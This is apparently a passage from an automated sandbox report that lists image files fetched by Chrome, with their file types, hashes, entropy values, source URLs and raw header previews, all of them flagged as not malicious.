                                              Preview:.PNG........IHDR...d...d.......g...0PLTE.....................BBB)))...vvv..........___v.......IDATX..Xm....>\^f..+..%....+...e~...e.J........E..b.%M...%.5a..vc..u1.....biC..").nWMZJ.f..?.VLiP.>..vuuv...?..;3.y..s.s.;.....o._6..L.pl.c...&.....=k...-e.../7....C.vU.t.U.#..x....\...h.?'Y..k?z.../.X...wm`....HYU8..%L..wm.*.$.7U....[K...M.&...J,(...1A...Q.V.}#.d@....9...../.........b....T.~.<.Z...i?....VZ.......k....6..<.l.v..r......l.L\..........c.[..1..ee.}..?#..r.....q%.oc.~d........,.....0.{....d....W.J.8....dP....h.s;.da.a`.~.z....2....@...f42...M..o.......n...D.."...20...6.<=f4..$....zmP6S.O..!...PxQ.....B......C....V..6..jv.L(....c.......9.....d}.R.5e....=..`.ma.s.......2..%*-M.w..n.-K...3...4.|.).:+.Q..+/...E....J..&u..&q...p......7.. ..$.5v..BaV#..iuS..%..(G>6 .I.....(...Dc.8..Qs........QG..8..p?.@..]o..(u.....Z....Z..GP.A<.T.*.0.[....dl.q..I..i.$....F.5.b....bnCHsrB0....d.9.l....+2...(.W%0........LT..N..6Mi.$G..qa...`..h..2A......(.5..D.e
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):17262
                                              Entropy (8bit):7.741279546588301
                                              Encrypted:false
                                              SSDEEP:384:4YNg7oVTxZV6W7Iu50NpxVB3fuNwH+gL6c7:4YyFu+3fuN/g9
                                              MD5:02752CA89DFB96A5EB6A06D617C3E3BA
                                              SHA1:B6FBA4284B7A3E5672571883C62C3B8164388E4C
                                              SHA-256:2696044EFBB7C92F885E701204C6FC2131FE41C661C43F89BF11F9EB6601663E
                                              SHA-512:E9D4C61B023A6543E5D77047B019F70C3001938BBD14E2EE552E9BB1C4F8FAE429473501FA5C633FCA3DB071E3728D94400A73E10978C75DC015E9C2C4A9109B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/12/40e3c08490ab6ed33ae9daa64249b8a6.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 392x392, segment length 16, baseline, precision 8, 5249x3963, components 3
                                              Category:dropped
                                              Size (bytes):2444985
                                              Entropy (8bit):7.92273727935342
                                              Encrypted:false
                                              SSDEEP:49152:dA9IyMVJDoa84BHvYQ60Ert3olEnhkkcPKxITaCV:dA9fcJDoaNpvlE5YSnhJcCxway
                                              MD5:48FA6E372B8439044A55221C0857AB49
                                              SHA1:2B2EC03487D6C85C675BB88C01D91D81C9CAA4FB
                                              SHA-256:A17F9DDA7BD2295A97394CB09CF68D72BD20F1939A3E5819DD844B8EF01F4ACC
                                              SHA-512:55E97E5F371C7B5B89A517B95730B2D9036A1D9A653445DC69C83DE03EF87D3CF0F9535BBA42D4EC59BD67C85AB656E5A4E476E590E765D32C7EA2FC27F68ABD
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):7556
                                              Entropy (8bit):7.912095943638799
                                              Encrypted:false
                                              SSDEEP:192:ZIIHUCD4waob8SMjMtIzb3u1JiA6sb/0h:f0wf4RMK/e1l6sb/E
                                              MD5:08C966368EADA90C8DEEFCBEABAA5D23
                                              SHA1:295C4A3883F66DCCC02651842F9D36986BDE6FC4
                                              SHA-256:1EC217430F5A609AE9E3E54F1C4CF66F0378E890586F41D20B290032F3E38E0B
                                              SHA-512:5CA7235AE3E4F761F6F2D326D7A978BBD21597BAE3CF2984131739D3A03EE424666949A0800691ECBD9AB3DEFA4F454BE5240A5AF086ECBBBC657DD47313A47B
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):12566
                                              Entropy (8bit):7.972478873956739
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wabgPHuAgp/sfw0A7J186choVQhXhxPIFGMbdyKrxZLdbJmr:K0w0g2bp/WYSzBhP+5bdyKrxtmr
                                              MD5:04202A673C2DEDB09A8D28D7ECB9BF84
                                              SHA1:5A168318742602C9FBC259D8B85E25C78B2E334F
                                              SHA-256:84924C97AC80915F08F76E473A7550CAB39329977DFC5565E05228A5EA8FF46A
                                              SHA-512:FFE293668D4CF1675CB99B274213F15EAC6933F1AF183430D119EEE477C6C161A5126ED61C28C50648D0322B485CBF2F9351DBD7C6B6224ECD3402E552E61F88
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/12.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 170x260, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):10354
                                              Entropy (8bit):7.97958291366673
                                              Encrypted:false
                                              SSDEEP:192:EEWlV3REz5X1+jbpwY7uiTh51rn9mUigSl+9Y9tTMfyNzmAfmMWHaOcQKOqHFu/u:EEWbREzJ1+jbpwY9xr9muT9Y9tgyNTem
                                              MD5:3234C44C689B7E964864E7AAE5EA5EF9
                                              SHA1:666DB5BC26327EA3D14AD5F0C1D3FF90C5AA0340
                                              SHA-256:83755C953954E2C9F1A9C85F66C07FEA6095FF23B46B22E13DCCAC202EF6ED33
                                              SHA-512:B649F4D4FF14F6DFD64A23CD05B6B5EC4191EA1D20786633A6102A9EC6A6410D3F59DB2385A273992928AD254F6BE81AD66CD4CABBBBCB25DB4E3441CC94F771
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/header/srv.webp
                                              Preview:RIFFj(..WEBPVP8 ^(.......*....>Q".E#.!.:..8....z-~+0+.......S.e.X..........r..H...X(r.?.~...._....o..b...........-|..........[.......^.....=...zO...n...o.SV....<"~......~../.....k.#P.}....?..].......P_.......|^...w.........G.../p?...?......c.=....n...............z.......p..?..........7...W..Zv...n..(..3.5H.......].Ur.e&.nF...6..y..q/>d..6..x...D.pO.,.jO..&'.Ct.+..J..0.IkNT...0.S../.y..+r,.:1.U..(b...._(.0^...n.......A.J.w..2...~K..S..y^....B.X.X./..k{.. .0Z..*.9|6..0Cp.:.... .=...T.9..u.i6.4....X......8..}.i.........0.[.a..C...0..A]ce<l.........Q..3f...\.p...SN....;...KwJ...=.4E8...F..............(^UJ..X_.............a=pQ.*...o..0Q*At`}...6..rX+*t.}.......H..t.v..v<E....>._...'.. H.r.......1....U....p.s....Nd.:...E.3cx....C..#.y.+.Z.......z...'.{.......6./wh..../.GB.MB.......iF.h...w..O...Q.u).....,.....2a.*.r.l...8.H...d..%..w.%..o......p.~.k........(......Ba./u.2/.b..aXR.Ny...P.C.. .!..j4.hw|.y..j.P...&..r.-...v..0..Xc..Y....W.6~Ob.S....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):72896
                                              Entropy (8bit):7.996854789103847
                                              Encrypted:true
                                              SSDEEP:1536:SMAErzL6/yPjrfof/nDgI1dHnHS4Hhb8TFEV3pl38os5Po:rLvfqBdHnPhb8Tcv3835
                                              MD5:26ECBA6DA4FA9E2A64B4658051BE6479
                                              SHA1:22AC47E427D11FE4AE376781330AA71E275353BB
                                              SHA-256:9493F4E3CC5F61BA2646F34E4CB56106354444F3BCDF0EB566805CB96AA20CA9
                                              SHA-512:00F360DF70A1B239BD59E65109D13EE5BE5B55271E797FFD35428C3658064502987258583C7B55A435A19D69793329B8B61715D1554E5F9C3E9E05C5FCAC814B
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X........O..T..ALPH2Y.....m.I......@DL@..A......Q2...R..v..*:...._...~.T...Y..gn.m...3&..:Q.*@....n@..p....g&8U.>.........@B.p.}..1.3.}#"`...6B /.h71i.I..v.m..l..wnR.U..4.6...-...:.. ..L`C...T....!p..u.d}..2"...........F*.....+..s.{"...=...D.S..)&).L.........?.=#Ti..y..^_.....?.....m..3i.......U....~.l.....Uf..}.X.e.?/.....G.........g.*.6.....xR|^{Q.R."..!......v.V......H..U-..j.<.r......N.g....T4...../...?.?...T............K^.d....1...8=s......si.....Y...EA<.=..}.&..dZ>./....g.....>.V..\Z}yL..+|..R.{.>.Y..........g..<.M...)../...)Vx6......>..u}......tWp:..?..k.t;..........S...s..?3..i/........L...r.Fy.2...p.......^.ax.-....T.6..........S.7.$|.k...).i...V.B....B..@/....D.N...3..g...._.\A..q.....'....i+.iN.>.gN".........O.'.&..2u..h..e..SB\v..*.M.......P+..r..........s.+>4....-......q{...z{.T....^...8ay.... _.@.*..x|..T...P.*......<"..FX?..,k....!...7%={Rv..{..t..%G)P?^..(:..p.......}.!k..9...@_|,.....v..9.Y....Y~.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14025
                                              Entropy (8bit):7.658695077271021
                                              Encrypted:false
                                              SSDEEP:384:4YNg7ZcCKlsLgKi2+LoOxcpIajFZYkTpo13:4Yy9cCjcsOrajFZzo13
                                              MD5:D8FDCAED0C4EA58B05338500AE294B6A
                                              SHA1:73A059DB460A45B0ACD499D0BE98777E3327C727
                                              SHA-256:99C626D274984B458785BD34D54855865845D6FECC42F01AD521D72C7D40A54E
                                              SHA-512:3DA0523307EE442D040EE70B363ADFD17BF6E88F147838D604F84C677B74B46D822D659C5F216E819CF6BEB36391DC9C9612DCACCF2BE26239974EBD017EA6AB
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14486
                                              Entropy (8bit):7.673685519938633
                                              Encrypted:false
                                              SSDEEP:384:4YNg7JeVAwwA/B/VcchrFd7W+48CQAa/Z/1GiIuXrbZc7D:4Yy9eSwnRbd7WLZVa/Zvr9cH
                                              MD5:24F29F29B86036510C3D779885092AF9
                                              SHA1:C1F0229C38CF4A9455D0E76E271A466544A90361
                                              SHA-256:F262D9480C03C59AD093737DFACABEAD81C817DADDDAA156EC63F95C5BC4ACE2
                                              SHA-512:FB8B5289BFFE58123BC3CDBB3801935350E2CEF50FBBD3C7CC17C6221854365DA23D55F5C851B2F651946531241A7B55C97592FF15BA0FC9D543949FDE5BA223
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/29/8edb889e2fd52dd423570280036e5693.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6784
                                              Entropy (8bit):7.94345694428201
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4waa0nzg8gafihHHbES2+xJXR0N:K0wenvfi5HbEj+JB0N
                                              MD5:F5D9208DEAACA5664119107FF6323F1B
                                              SHA1:CB6BD987E04319EAD3F8132DDDDCB7CB4CCC65B0
                                              SHA-256:CE6A8EDCFC3DDFDFBABCA544A51469AD80088B595D6F8F7EBB60A693BB16CBC6
                                              SHA-512:1C34AD05F829ED5AA574B657B48DAF7E0B1E2FD0DB8D024A0168DD62EFA0DF795EA0FC7A3FA4B1A123CEB24096C4EFB1CE8739F3AFFE30379EA8519DDF08AB15
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):168729
                                              Entropy (8bit):7.98380703685641
                                              Encrypted:false
                                              SSDEEP:3072:+j5UOMOc+MxpewEcu95pHWjHo/UeoEsfHZe1Hny4M/vc3z4OYrs055b/Z:m5UOMR+upe5n5kLvdEuHwM4M/n9r
                                              MD5:782167EB1042DF2AFE7F0AAF1F7E33AA
                                              SHA1:E15B170346B3216A8D50D40766578AD887B3D8C8
                                              SHA-256:AF46726E25B6EB3C0A6D61134E8B8A2AEC32FF79D2670C7E563B71C35921DAA7
                                              SHA-512:804940AA2A2C6A4ABC85D92C30B53511297EAB4743648C66A0205B6F6F64D31A4C4211BD31D3ED556DEC65CDA9D13AA8C15B5B70C0740366DDEAC4301306FA9A
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:0E36F9C3934311EDB686811DEEAB7B56" xmpMM:DocumentID="xmp.did:0E36F9C4934311EDB686811DEEAB7B56"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0E36F9C1934311EDB686811DEEAB7B56" stRef:documentID="xmp.did:0E36F9C2934311EDB686811DEEAB7B56"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............H....:..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 640x828, components 3
                                              Category:dropped
                                              Size (bytes):47800
                                              Entropy (8bit):7.910679313587453
                                              Encrypted:false
                                              SSDEEP:768:yGf+jRiwqnQogtUk085N6PAkoclOtuioUwcua2XGyaycP3KJCxNmh:N2FvpOk75N6PJOtugX0Al3KYCh
                                              MD5:77041B9159C795ADFF777BF47A6D6228
                                              SHA1:52CC4FD99F8F9769C4EEB3422532795C877E85AC
                                              SHA-256:66F6A9CE68621C8742ACE08DCA556581DC91D439EB6A3ED5394C691D6AF0B714
                                              SHA-512:10CB2835D1B79CBAD54E16D7E0DC1D20C601CFF12DFAB26B5BE8D6EBA9E8ECBD983E68E12B9E20B8B12D6C777698CA3A226B67A05EE6C8EE1775BDA6F69D60D2
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:B50F5A53930B11ED8650888EB478A393" xmpMM:DocumentID="xmp.did:B50F5A54930B11ED8650888EB478A393"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B50F5A51930B11ED8650888EB478A393" stRef:documentID="xmp.did:B50F5A52930B11ED8650888EB478A393"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................'..'2&.&2.&&&&.>55555>DAAAAAADDDDDDDDDDDDDDDDDDDDDDDDDDDDD.... . &..&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDD
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):126100
                                              Entropy (8bit):7.998489220764332
                                              Encrypted:true
                                              SSDEEP:3072:xWkzBPDP1QngrQXwucDS73r1Ub1NJBR2l8F0Lb:xWkFPDNQn62ws73JaTbklYy
                                              MD5:55CA39E4C532769EAEE4D3D619E2D788
                                              SHA1:89B2BC21314EC002B21ABD5AF15298E15953E075
                                              SHA-256:06196380D52A5E66B5695647A77AF2E9C834A643866C1FE23820DEC081312519
                                              SHA-512:24EFEAFF31E1E8E28051D510719C041607B105E4CEC9FE25C0296EEDE7ED7A30B1769FDF5119A8560F7B34D2ABA0E342B83CED58B669EE662157B5E11D3D8DDE
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 ....Pg...*....>.d.O.%,.+Y.2...enP.[?u.7.{..J....^.....y_...n6..~..u?....S...0.'.GJ.2...G..;....g.`..M...{.?.$m.G.h?...}N.s....G..#.....K.....?......}................?.........o...._.},._..l.........z.MO..@.......o.^..P.........O..................>....j...)iT.We...m..Z..A..Ve...^....,..h.....6.>.;o.._B.. .K.ksL..G..z>t2....z...W....!..B..>...Y.;.Y.M..Q......n.;....&i^....c6.....I..l/.:k.2O....S..#...G...a`..+..5.q..H...0V..N.R...[.&..C.........}...a..4..Z.z........uA.../bT].<..{..7.. ........*2'...e....*..._...I6k.CX.#=..........M.G....2......I.+.LD...........@F..5.\!..=.C:8..]....X..B....H.le..i...Y..m.Xv)9;_..N.q,1.9.....9...;..#..I....hC..t.........7.a..IP.'.R.....=).....|3.&c..5.^f.......0^@M..E..h..RL.~..8..A$..h}..L..i\...{.s.]8.!._.\u......\..H.$..u.g.....{.3.#Y..D.K.P.>..!.M.O.X...u................E.e.!u..m.U.%....7...T..@...].V..'.q..}..._.kJ.........d[...i..O....do....$TxT.....<.F.q...........V.:2ES
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 1024 x 640, 4-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):88160
                                              Entropy (8bit):7.9536186057379155
                                              Encrypted:false
                                              SSDEEP:1536:Y2WPVggYmZotI/kv1XG6gl2zKuqU+S4iopDVGjx7Fx0D6xbL1:Q+A+I/kvNLgqz+S0VV2xn0A
                                              MD5:E01E8B1F38B88AC37E235DFA961654CB
                                              SHA1:C29BE57528AE7F4A075FCFE05B6ADEC6640ECF8E
                                              SHA-256:AACDC68DE52F1A4885F6F352B9803CC8EBF08D4939B8F81B196F8B1189BCFB5A
                                              SHA-512:97BB8A87119F7B8E94C0781B3D2E9B197B1CBF0624A0DA143CA8F413EF8F60AE1341F469544DD3575033F9899A91B8CAF0C049F7E3BEC15397CF14E2DA356758
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/dynamic/19/8c31bd6a7e31516d9af11ddd76cf1f8b.png
                                              Preview:.PNG........IHDR..............S.R....gAMA......a.....sRGB........'PLTE...............)))>>>TTTmmm............1.w#.. .IDATx........$e..%`.2...h............l8..v../9.UE...Z.3..s8b......U.._.r........]....'|.t........=........2.u8.....^(.nw]6T.x.*#..:...vw...m.....'...g....f..U.`...N...fwM..S..L...8..4.h...nu..........A....~.~....P.t.oto.e^W..XNMr.Z3?..%...?.'.f..5....'..6.Dw.'O0....!.XN.1<.7..^........l......P.&...|a.~...H.2.........}... @(@..`..0..w..'|.?.!..x...}.....$.[x=5..[....f>.;...I.D.{.$......I........a..k.. .R...`...y..w8....+....=b......B.=....{.......=..N.`.o.....G.....&.......!...v.@._..%`../............).s.?.gI......\.... ...Z."..w..B.....G. ....0..TV.)<.....P.c..u.s..{V.............[..C2..A...6#....0-..(.r.....T$...).8"..... Sg.^............GZ.3..... @. ....r.`....m....._. ..^......c. .!......`.....M...lj.m...`.............k#.pE`.t." .@..P......W.. .Aj...@.}.(. .@..o..h...."..E.=.@...../.....X......@?.g.........8.h....(.`j.H.........]..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4269
                                              Entropy (8bit):7.9432018920833976
                                              Encrypted:false
                                              SSDEEP:96:b4CPVcWY5PI/RNPR77QNF/zhG3v1n9U5Ph9r7HUT7+u7Ba:sCG5sRYwR9U5Pr7HkpBa
                                              MD5:396B234784CD89BAA02C6541E220E261
                                              SHA1:32FA111FFB0F8DC325ABADA51605D186AF5FC6EB
                                              SHA-256:8A6DA96AF9C182FA695E23D7AAAF7930FE6A6548C78B4476E09C3D1E583260AA
                                              SHA-512:49C16EDC8FAECE13B264DE01B737D6326E8BBDE9F6900735B56E23BFF6D707319EF906416AC4328CB31F06C9931196280EA942675CF5804F3EBBE65932B24F50
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...}PLTE..a..a{.]..Y...............h.D........e..W..]........a............f.K....i..z........b...b.<b.AI.......W.....m..^|.f.O.{.[..h......x.R.....~.P.......M..U.w.l.j.0..z.]...R.w...e.t.G...s..a.....r.....Nt..m.J.I....W...Z..X.B.f.....}.EW..C.3.t... r}..n.c.;.........S......n.^G.~.K..V.O..&...3M..=.......D..'......2...*|......T].Z(.......l..j.....`..;..d....k...........x.Ft~..(....IDATh...W..... i.IH...Q.Ubx.P#.(o(..".D..L.j...jm;........w....i........:F..z.hjj.5e.V....!.&&&\.,...#paj...zT.........j..`...Zmr.59i9.......L>.f.#.......w9..\..k|l.611C.L.Z...>=}`}.......6CL../.&...X........'.....(._..@#.B...u...0...i.-.4...`j.. .ZH..6k..G.D...{.[3..D.v.....k...e.K.c.`..GM.........q.5...o....#...........M#....B..h...;..9. .".!.u.Mi........S..(.1....Qxf&..|>.....@.........*?.i..._.6p8..^...k.].{~.......<;.........P.l..#.O....z.C...0m.f..h4.~....~.....)....}....K..A4d....A.}p.....*.11*..A...i.~x....?z.c^....kX..}.6...7....Mr.{G...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6450
                                              Entropy (8bit):7.945327591543389
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xDdWbXZ0/a53GocvMnH1NTuHc0bmUSoYe88I:UIIHUCD4watOz52oce/TuOUN88I
                                              MD5:2D1BE37DE7B681C1AC77A23716FB4B3D
                                              SHA1:B952929F418B652001932508DF9816037E019911
                                              SHA-256:935965DE26DD0DA7905ABF2084A7C337CBC3406391DA896B721BAC5D0DDCFE21
